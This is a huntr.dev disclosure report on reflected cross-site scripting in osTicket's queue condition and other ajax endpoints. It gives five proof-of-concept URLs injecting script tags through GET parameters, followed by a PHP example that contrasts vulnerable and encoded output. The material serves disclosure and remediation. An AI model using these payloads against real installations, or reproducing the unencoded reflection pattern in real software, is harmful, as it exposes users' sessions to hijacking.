huntr report E58B38E0-4897-4BB0-84E8-A7AD8EFAB338 (www.huntr.dev), reported by indevi0us

Multiple XSS Vulnerabilities in Queue Condition

2022-12-12 18:48:10
indevi0us
www.huntr.dev
Tags: cross-site scripting, request echo, client-side code execution, unsanitized get parameters, reflected xss, url-based xss, osticket, security bug

EPSS: 0.001 (Low), percentile 23.5%

Description

Cross-Site Scripting (XSS) vulnerabilities arise when data is copied from a request and echoed into the application’s immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user’s browser in the context of that user’s session with the application.

In this specific case, after authenticating as an agent (administrative privileges are not required), an attacker can abuse the Queue Condition functionality, which is used in several places across the web application: the add and addProperty endpoints echo the GET parameters prop, condition and id into the response without sanitization, allowing attacker-supplied JavaScript to run client-side.

Further URL-based XSS vulnerabilities, affecting scp/ajax.php at staff/change-department and kb/faq/1/access, were found later and are included here as well.

Proof of Concept (exploiting prop GET parameter in /addProperty):

http://<TARGET>/osTicket/scp/ajax.php/queue/condition/addProperty?prop=background-colorvximw%22%3e%3cscript%3ealert(1)%3c%2fscript%3edhvmt&condition=1001

Proof of Concept (exploiting condition GET parameter in /addProperty):

http://<TARGET>/osTicket/scp/ajax.php/queue/condition/addProperty?prop=color&condition=1001ljos2%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Emui2bt(1)%3C%2fscript%3Edhvmt

Proof of Concept (exploiting id GET parameter in /add):

http://<TARGET>/osTicket/scp/ajax.php/queue/condition/add?field=isassigned&object_id=9&id=1001lr5is%22%3e%3cscript%3ealert(1)%3c%2fscript%3euoq07

Proof of Concept (exploiting Reflected XSS in osTicket/scp/ajax.php/staff/change-department):

http://<TARGET>/osTicket/scp/ajax.php/staff/change-departmenthpwc8%22%3e%3cscript%3ealert(1)%3c/script%3em7dak

Proof of Concept (exploiting Reflected XSS in osTicket/scp/ajax.php/kb/faq/1/access):

http://<TARGET>/osTicket/scp/ajax.php/kb/faq/1/accessmztvw%22%3e%3cscript%3ealert(1)%3c/script%3ez2p1d
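The root cause shared by all five findings above is a request value reflected into the response without output encoding. The following PHP snippet is an added illustration written for this page, not osTicket's own code: it shows a minimal handler that reflects a GET parameter into an HTML attribute in its vulnerable form and in a hardened form, and a JSON variant for the reflected-path case. The parameter name `prop` mirrors the report; the surrounding markup, the function names and the JSON response shape are assumptions.

```php
<?php
// Added example (not osTicket code). Demonstrates why the reported reflections
// are exploitable and how context-aware output encoding stops them.

// Vulnerable: the raw value is concatenated into an attribute. A value shaped
// like the report's payload, x"><script>alert(1)</script>, closes the quoted
// attribute and the tag, so the browser parses the injected <script> element.
function render_property_vulnerable(string $prop): string {
    return '<input type="text" name="prop" value="' . $prop . '">';
}

// Hardened: encode for the HTML attribute context the value lands in.
// ENT_QUOTES encodes both " and ' so the value cannot terminate the attribute;
// ENT_SUBSTITUTE replaces invalid byte sequences instead of returning an empty
// string; an explicit charset avoids encoder/decoder mismatches.
function render_property_safe(string $prop): string {
    $safe = htmlspecialchars($prop, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="prop" value="' . $safe . '">';
}

// For an AJAX endpoint that reports an unknown path (the staff/change-department
// and kb/faq/1/access cases), the hypothetical hardened pattern is to answer with
// application/json rather than HTML, and to hex-encode the characters that would
// matter if a browser ever rendered the body as markup.
function render_unknown_path_json(string $path): string {
    // Caller is assumed to send: header('Content-Type: application/json');
    return json_encode(
        ['error' => 'unknown path', 'path' => $path],
        JSON_HEX_TAG | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_HEX_APOS
    );
}

// Constructed sample input modelled on the payload shape in the report.
$prop = $_GET['prop'] ?? 'background-color"><script>alert(1)</script>';
$path = $_SERVER['PATH_INFO'] ?? '/staff/change-department"><script>alert(1)</script>';

echo "vulnerable: ", render_property_vulnerable($prop), "\n";
echo "hardened:   ", render_property_safe($prop), "\n";
echo "json:       ", render_unknown_path_json($path), "\n";
```

Running the script from the CLI uses the constructed defaults; in the hardened output the quote and angle brackets arrive as `&quot;`, `&lt;` and `&gt;`, so the attribute stays closed and no `<script>` element is parsed, while the JSON variant never places the value into an HTML context at all. Encoding must be chosen per output context (attribute, text node, JavaScript string, URL); a single HTML encoder applied everywhere is not sufficient on its own.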
